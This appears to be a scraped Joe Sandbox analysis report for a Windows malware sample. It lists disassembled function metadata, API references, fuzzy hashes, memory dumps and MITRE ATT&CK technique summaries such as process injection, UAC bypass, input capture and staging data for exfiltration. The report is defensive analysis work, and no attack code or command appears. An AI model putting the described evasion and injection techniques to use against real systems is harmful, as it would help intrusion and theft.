Opcode ID: 01b3d13c67ee31f5eaedde950b01197fe6809032d4562a66c9071031c7add8a6
Instruction ID: 8327a2b7ec6b1efa30d88977ddf8ee888bd300c35dda7810403e83a3f52e3585
Opcode Fuzzy Hash: 01b3d13c67ee31f5eaedde950b01197fe6809032d4562a66c9071031c7add8a6
Instruction Fuzzy Hash: A6219DB08402199FCB08DFA4D945AEEBBF4BB00306F0094ADE906BB392DB749609CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00E22150, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00E22158
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00E2219C

Part of subcall function 00E39E44: _Yarn.LIBCPMT ref: 00E39E63
Part of subcall function 00E39E44: _Yarn.LIBCPMT ref: 00E39E87

Strings

bad locale name, xrefs: 00E221AB

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 057abfeb9a83e7a16ef2e0e71287032f17a49eb4c837f32d0d137a48619c797c
Instruction ID: 129b0c7b58fbfef1a331e09c0a939f9f815a35277df0c2f527f075ed0efbc423
Opcode Fuzzy Hash: 057abfeb9a83e7a16ef2e0e71287032f17a49eb4c837f32d0d137a48619c797c
Instruction Fuzzy Hash: 79F04961101B409ED330DF7A9405743BEE4AF29310F005A1EE58AD7A42E3B5E508CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E61940, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00E61982
DName::operator+.LIBCMT ref: 00E61990

Strings

`#, xrefs: 00E61946

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: Name::operator+
String ID: `#
API String ID: 2943138195-2577689179
Opcode ID: 30449a3c60b0f417da951256e5e086333a8f77ca756510777208be14bfc6f9cc
Instruction ID: 5b2dc0528e70cc26c84b5de58e097563cbe3153cba1f8c8ebc03f02f51806e5f
Opcode Fuzzy Hash: 30449a3c60b0f417da951256e5e086333a8f77ca756510777208be14bfc6f9cc
Instruction Fuzzy Hash: 55F08171900219ABDB24AFA4E816BDE7BE8FF44791F045858B94577281EB30A944CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00E3B123, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

LCMapStringEx.KERNEL32(?,00E3AAE2,?,?,00000000,00000000,00000000,00000000), ref: 00E3B150
LCMapStringW.KERNEL32(00000000,00000000,?,?,00E3AAE2,?,?,?,00E3AAE2,?,?,00000000,00000000,00000000,00000000), ref: 00E3B16D

Strings

4, xrefs: 00E3B14A

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: String
String ID: 4
API String ID: 2568140703-1614143912
Opcode ID: ec7d46ab81605043d677cf4994b6ad5e755ff18ada3e69b8a3dfce876a6367ba
Instruction ID: d9168bb8019a5d3754eb879d4c8dde23bab05a7719ad8980c8269e9df276a40f
Opcode Fuzzy Hash: ec7d46ab81605043d677cf4994b6ad5e755ff18ada3e69b8a3dfce876a6367ba
Instruction Fuzzy Hash: F9F05A3250115ABF9F125F95EC198EB3F6AEF08760B044015BE19A6120CB729971EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E21C50, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00E21C55

Part of subcall function 00E39B14: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00E39B20

___std_exception_copy.LIBVCRUNTIME ref: 00E21C7E

Strings

map/set too long, xrefs: 00E21C50

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
String ID: map/set too long
API String ID: 1846318660-558153379
Opcode ID: f2df165ae9bd0b0200a8755f38e97f775f4b91caf5e5c32f4b0cad041e5d3511
Instruction ID: 4f805ff44bbd20dbd1461202291c08fcf23664af342e59e05e6cbdf4a8bbfe53
Opcode Fuzzy Hash: f2df165ae9bd0b0200a8755f38e97f775f4b91caf5e5c32f4b0cad041e5d3511
Instruction Fuzzy Hash: 0EE086B26002085FC3489F48E80788ABBDDDA04311700547EF649EB701D7F0D40087A8

Uniqueness

Uniqueness Score: -1.00%

Function 00E2F020, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

_abort.LIBCMT ref: 00E6CFF9

Strings

4, xrefs: 00E6CFE1
0/, xrefs: 00E2F03F

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: _abort
String ID: 0/$4
API String ID: 1888311480-2429951297
Opcode ID: 7875e12dd93e6d6e69f28d349321e121daf2d8386be48b26110b0ecb06f0adbd
Instruction ID: ffa9339ad07a89d7a562d1e02804904e81dd506ecc0da6b75124d92ad5088356
Opcode Fuzzy Hash: 7875e12dd93e6d6e69f28d349321e121daf2d8386be48b26110b0ecb06f0adbd
Instruction Fuzzy Hash: 66E0D831F95354A7C6143B755C0BB5DA5A06F40B50F25B258F664372C2CBE09E00D681

Uniqueness

Uniqueness Score: -1.00%

Function 00E2EFF0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

_abort.LIBCMT ref: 00E6CFF9

Strings

$/, xrefs: 00E2F00F
4, xrefs: 00E6CFE1

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: _abort
String ID: $/$4
API String ID: 1888311480-3832074509
Opcode ID: bfbe4961fe8451bbdb8228b044fb6ff7e1bf41454cb1b8ec6da69a3ade6eba82
Instruction ID: 375ad146f22c766c8707e0bb944c797d315489f0ed1f95f326d89c29ae352b01
Opcode Fuzzy Hash: bfbe4961fe8451bbdb8228b044fb6ff7e1bf41454cb1b8ec6da69a3ade6eba82
Instruction Fuzzy Hash: B7E09222B81354A7CA152B655C0BB5DA5A0AF40B50F147258B674362C2CBE49E00C681

Uniqueness

Uniqueness Score: -1.00%

Function 00E73113, Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E731A9
GetLastError.KERNEL32(?,00000000), ref: 00E731B7
MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,?,00000000,?,00000000), ref: 00E73212

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: c18fc7d697fefda9eda162059c736a152573b0396669ce4df08099ebbd20d04a
Instruction ID: b40d3cb51407ffd42b3fee1a1816e960798ab4398b79df207ed29b8fb0e63fc2
Opcode Fuzzy Hash: c18fc7d697fefda9eda162059c736a152573b0396669ce4df08099ebbd20d04a
Instruction Fuzzy Hash: E4410530A04286AFCF618FB4D844ABA7BA4EF01314F14D158E95DB71B2DB318E04E791

Uniqueness

Uniqueness Score: -1.00%

Function 00EB7DC0, Relevance: 5.1, APIs: 4, Instructions: 66memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00EB8260: CharNextA.USER32(?,?,?,00EB823A,?,00EB7DD3,?,00000000,?,00000000,00000000), ref: 00EB8275

lstrlenA.KERNEL32(00000000,?,00000000,?,00000000,00000000,?,?,?,?,?,?,00E92CE3,?), ref: 00EB7E1C
GetProcessHeap.KERNEL32(00000008,00000002,?,00000000,?,00000000,00000000,?,?,?,?,?,?,00E92CE3,?), ref: 00EB7E30
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00E92CE3,?), ref: 00EB7E37
lstrcpynA.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,?,00E92CE3,?), ref: 00EB7E42

Memory Dump Source

Source File: 00000013.00000002.487903664.0000000000E21000.00000020.00020000.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000013.00000002.487876998.0000000000E20000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.488035153.0000000000EDC000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488055077.0000000000EDD000.00000008.00020000.sdmp Download File
Associated: 00000013.00000002.488074027.0000000000EE0000.00000004.00020000.sdmp Download File
Associated: 00000013.00000002.488092832.0000000000EE3000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_e20000_arnatic_5.jbxd

Similarity

API ID: Heap$AllocCharNextProcesslstrcpynlstrlen
String ID:
API String ID: 2851663647-0
Opcode ID: ac46f129190c4dded636c3b35f55a7bd8b81864134025e7a2a0319a8885bf8e4
Instruction ID: 5e8276ecfde5263f9f4b7d158fa0773fcbaf5c25d244ba44f5371dec5cb6ca16
Opcode Fuzzy Hash: ac46f129190c4dded636c3b35f55a7bd8b81864134025e7a2a0319a8885bf8e4
Instruction Fuzzy Hash: 9111C4722042099F87009FA9A8C45EBB7FCEF89255B1041A9E949FB310DB719D08C790

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Function 0040BD85, Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 864
COMMONCrypto

Function 00404B47, Relevance: 1.5, APIs: 1, Instructions: 24
fileCOMMON

Function 00401014, Relevance: 49.6, APIs: 8, Strings: 20, Instructions: 609
COMMON

Function 0041910C, Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Function 0040492E, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 98
threadCOMMON

Function 00406018, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 47
libraryloaderCOMMON

Function 0040A53F, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 260
COMMON

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre